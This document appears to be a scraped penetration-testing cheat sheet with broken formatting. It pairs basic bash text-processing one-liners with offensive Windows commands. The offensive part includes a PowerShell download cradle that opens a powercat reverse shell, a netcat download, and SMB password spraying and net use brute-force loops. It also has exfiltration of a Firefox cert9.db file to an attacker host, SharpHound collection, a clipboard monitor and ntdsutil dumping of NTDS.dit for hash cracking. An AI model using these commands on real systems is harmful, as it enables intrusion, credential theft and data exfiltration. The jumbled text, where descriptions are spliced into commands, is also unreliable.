GREENIE=haha; export GREENIE
PATH=$PATH:/root/haha
sort | uniq -c | sort -n
stdin
, sorts it, finds out the count of each unique value, then sorts by numbercat squid_access.log | sort -k 2 | head
sort -k
parameters sorts on the second colmun of the outputwc -l
[lines]wc -c
[bytes]wc -w
[words]stdin
awk '{print $1,$4}'
stdin
awk '{print $(NF-1)}'
awk '{print length, $1}'
awk '{ sum += $1 } END { print sum }'
stdin
and adds up the values, quick and dirty calculator in terminalcat peptides.txt | while read line; do echo $line; done
peptides.txt
, then perform echo
for each line. Useful to loop through commands for a list of itemscat users.txt | while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H 10.10.10.172; done
bash
loopfor i in {1..5}; do echo $i; done
i
for i in {000..999}; do echo KEY-HAHA-$i; done
KEY-HAHA-000
to KEY-HAHA-999
TF=$(mktemp -d)
/tmp/tmp.gq9gT5U3
) and assign as an environment variable${#TF}
TF
variablesed 's/12/13/g'
12
with 13
found anywhere in stdin, will replace 1234
with 1334
sed -i.bak '/line to delete/d' *
xxd -p
stdin
or a file only, no hexdump formatxxd -r
stdin
, can redirect to save the hex to a fileget-childitem -hidden
gci -recurse C:\ | % { select-string -path $_ -pattern password} 2>$null
password
1..255 | % {ping -n1 192.168.0.$_ | sls ttl}
(New-Object System.Net.Webclient).DownloadFile("http://10.1.1.1:8000/nc.exe","C:\nc.exe")
C:\
locationIEX(New-Object System.Net.Webclient).DownloadString('http://10.1.1.1:8000/powercat.ps1');powercat -c 10.1.1.1 -p 8001 -e powershell.exe
certutil -hashfile ntds.dit md5
certutil -encodehex ntds.dit ntds.hex
certutil -encode test.jpg test.base64
certutil -decode test.base64 test.jpg
@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL
Invoke-RestMethod -Uri http://10.10.14.28:8000/ -Method Post -InFile copy_cert9.db -UseDefaultCredentials
iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1
$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } }
ntdsutil
activate instance ntds
ifm
create full C:\ntds
quit
quit
ntdsutil
tool to obtain the SYSTEM
registry and hive data as a backup, contains user hashes to crack